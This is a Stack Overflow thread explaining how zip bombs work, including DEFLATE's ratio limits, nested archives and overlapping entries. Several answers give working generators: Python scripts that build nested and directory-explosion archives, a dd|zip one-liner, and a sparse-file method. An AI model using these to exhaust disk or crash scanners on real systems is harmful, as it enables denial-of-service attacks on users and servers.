146

This question about zip bombs naturally led me to the Wikipedia page on the topic. The article mentions an example of a 45.1 kb zip file that decompresses to 1.3 exabytes.

What are the principles/techniques that would be used to create such a file in the first place? I don't want to actually do this; I'm more interested in a simplified "how-stuff-works" explanation of the concepts involved.

The article mentions 9 layers of zip files, so it's not a simple case of zipping a bunch of zeros. Why 9, why 10 files in each?

syntagma
  • 23,346
  • 16
  • 78
  • 134
pufferfish
  • 16,651
  • 15
  • 56
  • 65
  • So I'm not the only one that automatically opened up Wikipedia and read about this... good to know :) – Edan Maor Sep 22 '09 at 12:05
  • I'm curious. Antivirus does not check this (like that solution in python provided in 'This question')? – Arnis Lapsa Sep 22 '09 at 12:34
  • I know of at least one major production server that was taken down by a very large zip file. It wasn't an intentional zip bomb, the file extension of it was ".log" ;-P – Robert Fraser Sep 22 '09 at 12:36
  • Should we make a zip-bomb tag for this and other question? – James McMahon Sep 22 '09 at 12:45
  • Seems like a good tag instead of "math" and "computer-science", swap those with zip-bomb and zip – Chris S Sep 22 '09 at 13:02
  • 5
    @Michael your complaint isn't valid. Not only did OP ask how it works, nothing in the article posted says it is for the express purpose of disabling anti-virus. Quite the opposite, it seems the thrust of the article is a DOS-style attack with only a passing mention of anti-virus disabling. – San Jacinto Sep 22 '09 at 13:43
  • 2
    The point is that the OP was referring to a specific file, which consists of nested archives, not one huge compressed file. – Michael Borgwardt Sep 22 '09 at 15:54
  • 1
    I think Michael's right, he explains how to create the file described in the "PS", and everyone else doesn't. However, the "PS" was added as an edit, so those answers may not have been blatantly wrong at the time they were given. They just thought "such a file" meant "any file that decompresses to 1.3 exabytes", when it turns out it was intended to mean "a file structured like the one described in the article I link to". – Steve Jessop Sep 22 '09 at 16:33
  • 1
    @onebyone I agree completely. I just don't think a downvote is appropriate in such a circumstance. – San Jacinto Sep 22 '09 at 17:32
  • 4
    I guess it depends whether you consider a downvote to mean "this is not the best answer to the question", or "you are a fool and not worthy to live", or whereabouts in between. Personally, I take a downvote to mean I should re-read my answer and see if there's anything obviously wrong with it that I should fix. But then, I'm fairly happy now to be disagreed with and not change my answer, if I think my answer contributes something. And I've become fairly unconcerned about the whole voting process anyway, now that it's clear I'll never catch Jon Skeet ;-) – Steve Jessop Sep 22 '09 at 18:04
  • 1
    See also: http://www.steike.com/code/useless/zip-file-quine/ – sdcvvc Sep 25 '09 at 23:51
  • Would 1.3 exabytes cause a system to crash? – Joe R. Aug 06 '12 at 04:38
  • One does not simply make a Zip bomb... – rud3y Jan 06 '13 at 15:50

15 Answers

101

Citing from the Wikipedia page:

One example of a Zip bomb is the file 45.1.zip which was 45.1 kilobytes of compressed data, containing nine layers of nested zip files in sets of 10, each bottom layer archive containing a 1.30 gigabyte file for a total of 1.30 exabytes of uncompressed data.

So all you need is a single 1.3 GB file full of zeroes: compress that into a ZIP file, make 10 copies, pack those into a ZIP file, and repeat the copy-and-pack step until you have nine layers of nesting.

This way, you get a file which, when uncompressed completely, produces an absurd amount of data without requiring you to start out with that amount.

Additionally, the nested archives make it much harder for programs like virus scanners (the main target of these "bombs") to be smart and refuse to unpack archives that are "too large": until the last level, the total amount of data isn't that much; you don't "see" how large the bottom-level files are until you reach that level; and no individual file is "too large" on its own - only the huge number of them is problematic.
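As a rough sketch of that copy-and-pack process (at a deliberately tiny scale, with made-up names and sizes, not the actual 45.1.zip recipe), something like this Python script would do it:

import os
import zipfile

# Miniature sketch of the copy-and-pack trick described above.
# Sizes, names and layer counts are arbitrary; the real 45.1.zip starts
# from 1.3 GB of zeroes and uses far more copies and layers.
ZERO_BYTES = 10 * 1024 * 1024   # 10 MB of zeroes instead of 1.3 GB
COPIES = 10
LAYERS = 4

with open("zeros.bin", "wb") as f:
    f.write(b"\0" * ZERO_BYTES)

# Bottom layer: one archive holding the file of zeroes.
with zipfile.ZipFile("layer1.zip", "w", zipfile.ZIP_DEFLATED) as zf:
    zf.write("zeros.bin")

prev = "layer1.zip"
for layer in range(2, LAYERS + 1):
    name = f"layer{layer}.zip"
    with zipfile.ZipFile(name, "w", zipfile.ZIP_DEFLATED) as zf:
        for i in range(COPIES):
            # ten "copies" of the previous archive, stored under different names
            zf.write(prev, arcname=f"copy{i}.zip")
    prev = name
    print(name, os.path.getsize(name), "bytes on disk")

Each archive on disk stays small because its ten members are identical, so the next layer can compress much of that repetition away.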

Michael Borgwardt
  • 342,105
  • 78
  • 482
  • 720
  • 4
    Can't be... once you zip the file of zeros at the bottom, the resulting zipped file is not going to be nearly as compressible for the next layer. – pufferfish Sep 22 '09 at 12:29
  • 19
    Ah, but at each level, you have ten *identical* files - which again compresses nicely. Though ZIP does not exploit cross-file redundancy, an archive containing ten individually compressed identical files probably has lots of redundancy itself for the next layer to exploit. – Michael Borgwardt Sep 22 '09 at 12:34
  • 1
    This is insanely complicated, given that there are far simpler methods. As pufferfish pointed out, an already-compressed file is going to be *less* compressable than a non-compressed file, so your final zipped file will end up being larger than it needs to be. – Thomi Sep 22 '09 at 12:34
  • 12
    The point is NOT how to generate the maximum amount of data from the smallest possible file - the point is defeating virus scanners' attempts to guard against too-large archives. – Michael Borgwardt Sep 22 '09 at 12:40
  • 2
    That's not the thrust of the article on wikipedia. It seems to push a DOS-style attack. – San Jacinto Sep 22 '09 at 14:02
  • Yeah, but for that attack to succeed, the scanner has to actually open the archives, not refuse to do so because it can apply a simple "reject archives when the sum of the decompressed file size is larger than the HD's remaining free space" rule - the nested archives make it very hard to apply such a rule without already crashing during its application. – Michael Borgwardt Sep 22 '09 at 14:29
  • 1
    What you are saying is true, but you are downvoting valid answers based off of something the OP didn't even ask. Additionally, there are PLENTY of unzip tools that don't even pass the archive THROUGH the anti-virus, and there are many ways to obtain a file where the anti-virus doesn't have knowledge of the archive's existence. Also, what you are saying is extremely product-dependent. I see no reason for you to downvote simply because it doesn't fit your exact use case. Others have answered the OP correctly, even if not as thoroughly as your response was because of your knowledge of the topic. – San Jacinto Sep 22 '09 at 15:42
  • All modern anti-virus scanners work on-access and monitor all downloads (corporate proxies do this centrally). They do not depend on the cooperation of an unzip tool. In fact, I'm not aware of any unzip tool that actively calls a virus scanner to check archives. – Michael Borgwardt Sep 22 '09 at 15:52
  • 1
    Again, this is making a lot of assumptions. How many Linux servers are out there not running any anti-virus at all? I'm tired. You win. – San Jacinto Sep 22 '09 at 17:27
  • 2
    But the files don't get extracted recursively... the victim should keep on extracting the sub zip files to make it work...Any work around for it. – Manoj Sep 22 '09 at 17:52
  • 1
    A virus scanner *has* to recursively open archives in order to scan the files in them - or reject nested archives, but then you'll end up rejecting a lot of legitimate stuff (nearly every non-trivial Java app will have JAR libraries inside its distribution/installation archive). – Michael Borgwardt Sep 22 '09 at 19:26
  • @unknown I'm not saying all computers are running such virus scanners - but a very large percentage of all Windows PCs (and probably servers as well) does, and that's how they work. – Michael Borgwardt Sep 22 '09 at 19:28
  • @Michael I'm not contesting your explanation. Please see the comments on the OP. – San Jacinto Sep 22 '09 at 20:03
  • I tried making a file of zeros (1gb) and zipping it. It produces a 500mb zip file, unless Michael meant 0000,0000 for each byte. – Chris S Sep 22 '09 at 21:58
  • Also if you look at the exploit details, you can see McAfee, Sophos and a few others plugged this hole a while ago. However it still remains from 2001. Scansafe sees it at a trojan for some reason. – Chris S Sep 22 '09 at 22:02
  • If 1GB of zeroes (binary or ASCII zeroes does not matter) produces a 500MB ZIP file, then you either messed up and did not in fact fill the file with zeroes, or your ZIP packer is really really bad. And yeah, this isn't exactly new, so I'd expect the antivirus makers to have wised up... it's not impossible to defend against such a file, just somewhat hard. – Michael Borgwardt Sep 22 '09 at 22:24
59

Create a 1.3 exabyte file of zeros.

Right click > Send to compressed (zipped) folder.

wefwfwefwe
  • 3,382
  • 1
  • 21
  • 24
47

This is easily done under Linux using the following command:

dd if=/dev/zero bs=1024 count=10000 | zip zipbomb.zip -

Replace count with the number of kilobytes you want to compress. The example above creates a roughly 10 MB zip bomb (not much of a bomb at all, but it shows the process).

You DO NOT need hard disk space to store all the uncompressed data.
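If you'd rather stay in Python, here is a rough equivalent of that pipe (the member name and sizes are placeholders): the zeroes are generated and compressed chunk by chunk, so the uncompressed data never exists on disk. Writing archive members this way needs Python 3.6 or newer.

import zipfile

# Rough Python equivalent of the dd | zip pipe: zeroes are generated and
# compressed chunk by chunk, so the uncompressed data never hits the disk.
CHUNK = 1024 * 1024      # 1 MiB of zeroes per write
TOTAL_MB = 100           # plays the role of "count" in the dd example

with zipfile.ZipFile("zipbomb.zip", "w", zipfile.ZIP_DEFLATED) as zf:
    # force_zip64 lets the entry grow past 4 GiB if TOTAL_MB is increased
    with zf.open("zeros.bin", "w", force_zip64=True) as member:
        for _ in range(TOTAL_MB):
            member.write(b"\0" * CHUNK)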

Thomi
  • 11,647
  • 13
  • 72
  • 110
  • 9
    But you *need* the computing power to compress the uncompressed data, it's still O(n) in the size of the *uncompressed* data. – tonfa Sep 22 '09 at 15:08
  • 2
    Yes, as are all the other answers here. – Thomi Sep 22 '09 at 15:12
  • 7
    Michael Borgwardt's answer is O(log N) in the size of the uncompressed data. – Steve Jessop Sep 22 '09 at 16:23
  • 1
    Approximately, anyway. Each repeat of the process "strip off the archive headers, duplicate the compressed file entry 10 times, replace the archive headers, compress" increases the level of zip nesting by 1, takes time proportional to the size of the compressed data from the previous step, multiplies the size of the uncompressed data by 10, and if it increases the size of the compressed data at all, certainly doesn't do so by anything like a linear factor. – Steve Jessop Sep 22 '09 at 16:36
  • 4
    So just as a test, I zip -9 1.3 GB of zeros. The result is a 1.3M file. I duplicated this 10 times (couldn't be bothered messing with the zip headers, so the result won't work as a zip bomb, but illustrates the principle) to give a 13M file, which compresses with zip -9 to 34381 bytes. So the duplication step actually makes the file smaller, because deflate only supports tokens of a certain max size. Next step results in 18453, then 19012, 19312, 19743, 20120, 20531, 20870. – Steve Jessop Sep 22 '09 at 17:02
  • @tonfa I don't think compute cost can be compared here because this bomb doesn't do the same thing as in Michael Borgwardt's answer. _This_ bomb only requires the victim to double click one zip file one time. Michael Borgwardt's bomb requires the victim to _recursively_ unzip _all_ the nested zip files. Also this bomb looks like a single file, whereas the other solution creates a big file tree, so semantically the payload is much larger/more complex than the payload from this solution. – Noah Sussman Feb 20 '16 at 00:48
  • you forgot the conv=sparse for you last sentence to be true. – jrwren Oct 30 '18 at 13:41
10

Below is for Windows:

From the Security Focus proof of concept (NSFW!), it's a ZIP file with 16 folders, each with 16 folders, which goes on like so (42 is the zip file name):

\42\lib 0\book 0\chapter 0\doc 0\0.dll
...
\42\lib F\book F\chapter F\doc F\0.dll

I'm probably wrong with this figure, but it produces 4^16 (4,294,967,296) directories. Because each directory needs allocation space of N bytes, it ends up being huge. The dll file at the end is 0 bytes.

Unzipped, the first directory alone (\42\lib 0\book 0\chapter 0\doc 0\0.dll) results in 4 GB of allocation space.
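A rough sketch of the same idea in Python (with a much smaller, made-up fan-out; the folder names just mirror the structure quoted above, they are not the actual proof-of-concept): the archive itself stays tiny because every entry is empty, and the damage comes from the sheer number of directories the extractor has to create.

import zipfile

# Lots of zero-byte files spread across lots of nested folders: the zip is
# tiny, but extraction forces the filesystem to allocate every directory.
FAN_OUT = 8   # 8**4 = 4096 leaf directories; the real file uses 16-way nesting

with zipfile.ZipFile("dirbomb.zip", "w", zipfile.ZIP_DEFLATED) as zf:
    for a in range(FAN_OUT):
        for b in range(FAN_OUT):
            for c in range(FAN_OUT):
                for d in range(FAN_OUT):
                    path = f"lib {a:X}/book {b:X}/chapter {c:X}/doc {d:X}/0.dll"
                    zf.writestr(path, b"")   # zero-byte payload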

Chris S
  • 64,770
  • 52
  • 221
  • 239
  • I guess some workplaces have filtering or logging of such "dubious" sites... :-) – Shalom Craimer Sep 22 '09 at 12:50
  • 28
I just assumed there were naked ladies doing security research. – James McMahon Sep 22 '09 at 12:53
  • 3
    The zip was nsfw. A big panic red alarm will go off and a cage will fall down from the ceiling around your desk – Chris S Sep 22 '09 at 12:54
  • You'll get an angry sys admin running to your desk if you click on the link, or just blocked URL and then a meeting with HR if you work at that kind of establishment – Chris S Sep 22 '09 at 14:05
  • 4
    If every hit on a virus file results in an interview with HR, then either you don't need the virus scanner, or else you don't need your HR department. One of them isn't contributing to the business ;-) – Steve Jessop Sep 22 '09 at 16:21
  • 2
    Could also be NSFW because a Network Virus Scanner might want to check it - and extract it to do so. – Michael Stum Sep 22 '09 at 18:13
  • 5
    The virus scanner should just mark it suspicious (which may result in it being safely blocked, or may result in you unsafely being reported for trying to install viruses). If the bomb actually explodes, then your IT department has learnt something valuable - they need a better virus scanner. – Steve Jessop Sep 23 '09 at 01:06
9

Serious answer:

(Very basically) Compression relies on spotting repeating patterns, so the zip file would contain data representing something like

0x100000000000000000000000000000000000  
(Repeat this '0' ten trillion times)

Very short zip file, but huge when you expand it.

wefwfwefwe
  • 3,382
  • 1
  • 21
  • 24
  • 1
    That could be compressed even further, really: 0x1(0x35) (that is, the second 0 is repeated 35 times so it would expand to your comment) – Michael Jan 13 '11 at 04:08
6

The article mentions 9 layers of zip files, so it's not a simple case of zipping a bunch of zeros. Why 9, why 10 files in each?

First off, the Wikipedia article currently says 5 layers with 16 files each. Not sure where the discrepancy comes from, but it's not all that relevant. The real question is why use nesting in the first place.

DEFLATE, the only commonly supported compression method for zip files*, has a maximum compression ratio of 1032. This can be achieved asymptotically for any repeating sequence of 1-3 bytes. No matter what you do to a zip file, as long as it is only using DEFLATE, the unpacked size will be at most 1032 times the size of the original zip file.
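You can see that ceiling with a quick experiment, sketched here with Python's zlib module (which implements DEFLATE); the exact ratio varies with compression level and input size, but it never exceeds roughly 1032:

import zlib

# DEFLATE's best case is a long run of identical bytes; even then the
# compression ratio tops out at roughly 1032:1.
raw_size = 100 * 1024 * 1024                  # 100 MiB of zeroes
compressed = zlib.compress(b"\0" * raw_size, 9)
print(raw_size / len(compressed))             # a little over 1000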

Therefore, it is necessary to use nested zip files to achieve really outrageous compression ratios. If you have 2 layers of compression, the maximum ratio becomes 1032^2 = 1065024. For 3, it's 1099104768, and so on. For the 5 layers used in 42.zip, the theoretical maximum compression ratio is 1170572956434432. As you can see, the actual 42.zip is far from that level. Part of that is the overhead of the zip format, and part of it is that they just didn't care.

If I had to guess, I'd say that 42.zip was formed by just creating a large empty file, and repeatedly zipping and copying it. There is no attempt to push the limits of the format or maximize compression or anything - they just arbitrarily picked 16 copies per layer. The point was to create a large payload without much effort.

Note: Other compression formats, such as bzip2, offer much, much, much larger maximum compression ratios. However, most zip parsers don't accept them.

P.S. It is possible to create a zip file which will unzip to a copy of itself (a quine). You can also make one that unzips to multiple copies of itself. Therefore, if you recursively unzip a file forever, the maximum possible size is infinite. The only limitation is that it can increase by at most 1032 on each iteration.

P.P.S. The 1032 figure assumes that file data in the zip are disjoint. One quirk of the zip file format is that it has a central directory which lists the files in the archive and offsets to the file data. If you create multiple file entries pointing to the same data, you can achieve much higher compression ratios even with no nesting, but such a zip file is likely to be rejected by parsers.

Antimony
  • 37,781
  • 10
  • 100
  • 107
5

To create one in a practical setting (i.e. without creating a 1.3 exabyte file on your enormous hard drive), you would probably have to learn the file format at a binary level and write something that translates to what your desired file would look like, post-compression.

Andy_Vulhop
  • 4,699
  • 3
  • 25
  • 34
4

A nice way to create a zipbomb (or gzbomb) is to know the binary format you are targeting. Otherwise, even if you use a streaming file (for example using /dev/zero) you'll still be limited by computing power needed to compress the stream.

A nice example of a gzip bomb: http://selenic.com/googolplex.gz57 (there's a message embedded in the file after several levels of compression, resulting in huge files)

Have fun finding that message :)

tonfa
  • 24,151
  • 2
  • 35
  • 41
3

Silicon Valley Season 3 Episode 7 brought me here. The steps to generate a zip bomb would be.

  1. Create a dummy file with zeros (or ones if you think they're skinny) of size (say 1 GB).
  2. Compress this file to a zip-file say 1.zip.
  3. Make n (say 10) copies of this file and add these 10 files to a compressed archive (say 2.zip).
  4. Repeat step 3 k number of times.
  5. You'll get a zip bomb.

For a Python implementation, check this.

Abdul Fatir
  • 6,159
  • 5
  • 31
  • 58
3

It is not necessary to use nested files; you can take advantage of the zip format to overlap data.

https://www.bamsoftware.com/hacks/zipbomb/

"This article shows how to construct a non-recursive zip bomb that achieves a high compression ratio by overlapping files inside the zip container. "Non-recursive" means that it does not rely on a decompressor's recursively unpacking zip files nested within zip files: it expands fully after a single round of decompression. The output size increases quadratically in the input size, reaching a compression ratio of over 28 million (10 MB → 281 TB) at the limits of the zip format. Even greater expansion is possible using 64-bit extensions. The construction uses only the most common compression algorithm, DEFLATE, and is compatible with most zip parsers."

"Compression bombs that use the zip format must cope with the fact that DEFLATE, the compression algorithm most commonly supported by zip parsers, cannot achieve a compression ratio greater than 1032. For this reason, zip bombs typically rely on recursive decompression, nesting zip files within zip files to get an extra factor of 1032 with each layer. But the trick only works on implementations that unzip recursively, and most do not. The best-known zip bomb, 42.zip, expands to a formidable 4.5 PB if all six of its layers are recursively unzipped, but a trifling 0.6 MB at the top layer. Zip quines, like those of Ellingsen and Cox, which contain a copy of themselves and thus expand infinitely if recursively unzipped, are likewise perfectly safe to unzip once."

2

Tried it. The output was a small 84 KB zip file.

Steps I made so far:

  1. Create a 1.4 GB .txt file full of '0's.
  2. Compress it.
  3. Rename the .zip to .txt, then make 16 copies.
  4. Compress all of them into a .zip file.
  5. Rename the renamed .txt files inside the .zip file back to .zip.
  6. Repeat steps 3 to 5 eight times.
  7. Enjoy :)

Though I don't know how to explain why compressing the renamed zip files still shrinks them further, it works. Maybe I just lack the technical terms.

jaycroll
  • 67
  • 5
  • 1
    By the way, don't be afraid that it will continuously extract all the zip files inside it. It only extracts the zip file that are nested below it, and not all the way to the bottom. – jaycroll Oct 17 '12 at 09:44
2

Perhaps, on Unix, you could pipe a certain amount of zeros directly into a zip program or something? I don't know enough about Unix to explain how you would do that, though. Other than that, you would need a source of zeros and pipe them into a zipper that reads from stdin or something...

Svish
  • 152,914
  • 173
  • 462
  • 620
  • Downvoted for disregarding the actual question, which mentions a specific file that's explicitly not the result of zipping one big stream of zeroes. – Michael Borgwardt Sep 22 '09 at 12:38
  • Nope, you'll still be limited by the computing power. Ideally you don't want to run gzip/zip since it will use a lot of CPU (or at least O(n) n being the size of the decompressed file) – tonfa Sep 22 '09 at 12:38
  • @tonfa: Well, of course you will be limited by computing power. My reasoning was that you might not want to create an exabyte large file on your disc and then zip that... – Svish Sep 22 '09 at 13:01
2

All file compression algorithms rely on the entropy of the information to be compressed. A stream of nothing but 0's (or nothing but 1's) has almost no entropy, so the longer it is, the better it compresses.

That's the theory part. The practical part has already been pointed out by others.

Calyth
  • 1,673
  • 3
  • 16
  • 26
2

Recent (post-1995) compression algorithms like bz2, lzma (7-zip) and rar give spectacular compression of monotonous files, and a single layer of compression is sufficient to wrap oversized content down to a manageable size.

Another approach is to create a sparse file of extreme size (exabytes) and then compress it with something mundane that understands sparse files (e.g. tar). If the examiner streams the file, it will have to read past all those zeros that exist only to pad between the actual content; if the examiner writes it to disk, however, very little space will be used (assuming a well-behaved unarchiver and a modern filesystem).
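A minimal sketch of the sparse-file part on a Unix-like system (sizes are arbitrary, and whether the file is actually stored sparsely depends on the filesystem):

import os

# Make a file whose apparent size is 10 GiB but which occupies almost no
# disk blocks: seek far past the start and write a single byte.
# Needs a filesystem with sparse-file support (ext4, XFS, APFS, NTFS, ...).
APPARENT_SIZE = 10 * 1024**3

with open("sparse.bin", "wb") as f:
    f.seek(APPARENT_SIZE - 1)
    f.write(b"\0")

st = os.stat("sparse.bin")
print("apparent size:", st.st_size)           # 10 GiB
print("disk usage   :", st.st_blocks * 512)   # a few KiB at most (Unix only)

GNU tar's --sparse option can then archive the file efficiently, while anyone who streams the extracted contents still has to process the full apparent size.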

user340140
  • 628
  • 6
  • 10
1

I don't know if ZIP uses Run Length Encoding, but if it did, such a compressed file would contain a small piece of data and a very large run-length value. The run-length value would specify how many times the small piece of data is repeated. When you have a very large value, the resultant data is proportionally large.
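As a toy illustration of that hypothetical (plain run-length encoding; ZIP actually uses DEFLATE, which handles long runs through LZ77-style back-references instead):

# Toy run-length decoder: each (byte_value, run_length) pair expands to
# run_length copies of that byte, so a handful of input bytes can describe
# an arbitrarily large output.
def rle_expand(pairs):
    for value, run_length in pairs:
        yield bytes([value]) * run_length

# Two tiny pairs describing ~2 GB of output; don't actually join this in memory!
bomb = [(0x00, 10**9), (0xFF, 10**9)]
print("decoded size would be", sum(run for _, run in bomb), "bytes")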

Joe
  • 46,419
  • 33
  • 155
  • 245
  • 2
    ZIP uses the Lempel-Ziv-Welch (or a modified version of) compression which effectively tokenises the data. Long runs of 'sets' of bytes will result in good compression, hence why GIF (which also uses LZW) is good for graphics and JPEG (which uses a complex sine wave compression) is better for photos where the data is much more 'random'. – Lazarus Sep 22 '09 at 12:15